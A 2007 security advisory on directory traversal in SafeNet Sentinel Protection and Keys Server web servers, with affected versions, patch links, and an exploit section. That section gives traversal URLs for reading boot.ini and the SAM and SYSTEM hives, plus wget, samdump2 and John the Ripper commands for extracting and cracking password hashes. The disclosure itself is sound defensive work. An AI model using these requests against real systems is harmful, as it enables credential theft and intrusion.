SUMMARY
=======

SafeNet Inc.'s Sentinel Protection Server and Sentinel Keys Server
products include web servers which are vulnerable to directory
traversal attacks. A remote attacker could exploit these
vulnerabilities to read arbitrary files with the permissions of the web
server, typically SYSTEM.

AFFECTED SOFTWARE
=================

* Sentinel Protection Server 7.0.0 through 7.4.0 and possibly below
* Sentinel Keys Server 1.0.3 and possibly below

UNAFFECTED
==========

* Sentinel Protection Server 7.4.1
* Sentinel Keys Server 1.0.4

IMPACT
======

A remote attacker could exploit this vulnerability to read sensitive
files on the affected system. Attractive targets include the SAM
registry hive which contains system password hashes.

DETAILS
=======

Sentinel Protection Server and Sentinel Keys Server run web servers on
ports 6002 and 7002, respectively, to allow remote monitoring of key
use. The web server software does not santize request paths correctly
before using them in system calls. As a result, an attacker can request
files outside the web server's directory root by using the ../ notation
to refer to the parent directory of the current directory.

SOLUTION
========

Upgrade to Sentinel Protection Server 7.4.1 and Sentinel Keys Server
1.0.4.

First upgrade the Sentinel Driver software to 7.4.0 if you are using an
earlier version.

http://safenet-inc.com/support/files/Sentinel_Protection_Installer_7.4.0.zip

Then install "Security Patch to Sentinel Protection Installer 7.4.0"

http://safenet-inc.com/support/files/SPI740SecurityPatch.zip

EXPLOIT
=======

Most popular web browsers are not be able to display URLs exploiting
this problem. I recommend using wget or lynx instead.

Substitute port 7002 to target Keys Server instead of Protection
Server.

This example will retrieve the C:\boot.ini file.

http://XX.XX.XX.XX:6002/../../../../../../boot.ini

This example will retrieve a copy of the target system's SAM registry
hive from the Windows repair folder:

http://XX.XX.XX.XX:6002/../../../../../../winnt/repair/sam

With the SAM and SYSTEM registry hives, it is possible to extract the
system's local password hashes for offline cracking. For example, using the
bkhive, samdump2, and John the Ripper tools:

$ wget -q http://XX.XX.XX.XX:6002/../../../../../../winnt/repair/sam
$ wget -q http://XX.XX.XX.XX:6002/../../../../../../winnt/repair/system
$ bkhive system keyfile
$ samdump2 sam keyfile > hashes
$ john --wordlist=all hashes

http://ophcrack.sourceforge.net/bkhive.php
http://www.openwall.com/john/

ACKNOWLEDGMENTS
===============

Thanks to SafeNet for patching this vulnerability and for working with
me on this advisory.

According to Digital Defense, Inc.'s advisory, Corey Lebleu originally
discovered this problem on October 10th, 2007. I discovered the same
vulnerability independently on October 29th, 2007. I have no reason to
doubt Digital Defense, Inc.'s claim, and do not claim to have
discovered the problem first.

REVISION HISTORY
================

2007-11-26  original release

-- 
Elliot Kendall <ekendall@brandeis.edu>
Network Security Architect
Brandeis University

Trouble replying? See http://people.brandeis.edu/~ekendall/sign/